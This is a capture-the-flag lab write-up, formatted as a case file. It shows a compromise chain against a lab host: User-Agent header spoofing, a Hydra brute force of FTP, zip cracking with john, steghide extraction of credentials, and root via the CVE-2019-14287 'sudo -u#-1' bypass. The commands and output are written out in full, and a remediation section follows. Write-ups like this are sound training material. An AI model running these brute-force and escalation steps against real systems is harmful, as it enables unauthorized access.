Case file

User-Agent gate, FTP stego chain, and sudo runas bypass

Apache gated content on User-Agent C (agent chris). Hydra cracked FTP; binwalk/zip2john and steghide recovered james’s SSH password. CVE-2019-14287 sudo -u#-1 bypass yielded root.

Foundations28 minLinux · FTP · Steganography · CVE
  • We bypassed a User-Agent access gate, cracked weak FTP credentials, extracted secrets from stego/zip artifacts, authenticated as james over SSH, and escalated with CVE-2019-14287.

  • nmap mapped FTP/SSH/HTTP. User-Agent: C redirected to agent_C_attention.php.

  • Hydra: chris/crystal. FTP held To_agentJ.txt, cute-alien.jpg, cutie.png. binwalk extracted an encrypted zip; john recovered alien. steghide on the JPG used Area51.

  • SSH with recovered credentials. sudo allowed runas all except root; sudo -u#-1 /bin/bash returned root.

01

Engagement summary

We bypassed a User-Agent access gate, cracked weak FTP credentials, extracted secrets from stego/zip artifacts, authenticated as james over SSH, and escalated with CVE-2019-14287.

Target 10.10.14.138 exposed FTP, SSH, and Apache. The announcement page redirected agents based on User-Agent. Header C revealed agent chris and a warning about a weak password. Hydra recovered FTP password crystal. Embedded zip and steghide payloads disclosed james / hackerrules!. sudo -l showed a runas configuration vulnerable to CVE-2019-14287 (sudo -u#-1).

Business impact

Security-through-obscurity User-Agent checks are not access control. Weak FTP passwords plus stego-stored credentials and a known sudo bypass completed the path to root.

02

Recon and User-Agent gated content

nmap mapped FTP/SSH/HTTP. User-Agent: C redirected to agent_C_attention.php.

OPERATOR · NMAP

savvy@lab:~$ sudo nmap 10.10.14.138 -sV -A -sC -Pn

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

OPERATOR · CURL UA

savvy@lab:~$ curl http://10.10.14.138 -H "User-Agent: C" -L

Attention chris, ...

Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!

From, Agent R

03

FTP access and stego/zip extraction

Hydra: chris/crystal. FTP held To_agentJ.txt, cute-alien.jpg, cutie.png. binwalk extracted an encrypted zip; john recovered alien. steghide on the JPG used Area51.

OPERATOR · HYDRA FTP

savvy@lab:~$ hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.14.138 -t 40

[21][ftp] host: 10.10.14.138 login: chris password: crystal

OPERATOR · BINWALK + JOHN

savvy@lab:~$ binwalk cutie.png -e

34562 Zip archive data, encrypted … name: To_agentR.txt

savvy@lab:~$ zip2john 8702.zip > hash

savvy@lab:~$ john hash --show

8702.zip/To_agentR.txt:alien:To_agentR.txt:8702.zip

OPERATOR · STEGHIDE

savvy@lab:~$ steghide extract -sf cute-alien.jpg -p Area51

# extracted material disclosed james / hackerrules!

04

SSH as james and CVE-2019-14287

SSH with recovered credentials. sudo allowed runas all except root; sudo -u#-1 /bin/bash returned root.

OPERATOR · SSH + SUDO

savvy@lab:~$ ssh james@10.10.14.138

password: hackerrules!

savvy@lab:~$ sudo -l

(ALL, !root) /bin/bash

savvy@lab:~$ sudo -u#-1 /bin/bash

root@lab:~#

Remediation

Replace User-Agent gates with real authentication, enforce strong FTP/SSH passwords, do not hide credentials in media files, and patch sudo past CVE-2019-14287 (disallow runas exclusions that the bug bypasses).